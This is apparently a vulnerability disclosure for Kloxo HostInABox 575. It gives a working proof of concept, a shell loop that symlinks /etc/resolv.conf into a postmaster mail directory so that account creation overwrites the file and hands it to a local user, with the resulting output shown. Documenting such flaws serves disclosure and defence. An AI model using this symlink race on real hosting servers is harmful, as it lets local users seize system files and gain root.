Kloxo HostInABox 575 - 2 more symlinks to own any file on the box



DESCRIPTION


Local users could overwrite and take control of any file on the box.



IMPACT


Local users could obtain root privileges.


First, run this command:

[user1@testing574 ~]$ while true ; do ln -s /etc/resolv.conf /home/lxadmin/mail/domains/example.com/postmaster/.bogopref.cf ; done


Next, create new account in kloxo for example.com. Then observe the result:

[user1@testing574 ~]$ ls -l /etc/resolv.conf
-rw-r--r-- 1 user1 user1 185 May 25 16:29 /etc/resolv.conf
[user1@testing574 ~]$ cat /etc/resolv.conf
spam_cutoff  0.7
spam_subject_tag=******SPAM******
wordlist R,user,postmaster_example_com.wordlist.db,1
wordlist R,system,wordlist.db,2
wordlist R,system,kloxo.wordlist.db,3


This also works for /home/lxadmin/mail/domains/example.com/postmaster/.maildroprc


[root@testing574 ~]# ls -l /etc/resolv.conf
-rwx------ 1 user1 user1 377 May 26 06:14 /etc/resolv.conf
[root@testing574 ~]# cat /etc/resolv.conf
SHELL=/bin/sh

if ( $SIZE < 96144 )
{
exception  {
xfilter "bogofilter -d /var/bogofilter/ -ep -c /home/lxadmin/mail/domains/example.com/postmaster/.bogopref.cf"
}
}
 if ( /^X-Bogosity: Spam, tests=bogofilter/ )
{
 to /home/lxadmin/mail/domains/example.com/postmaster/Maildir
 }

to /home/lxadmin/mail/domains/example.com/postmaster/Maildir/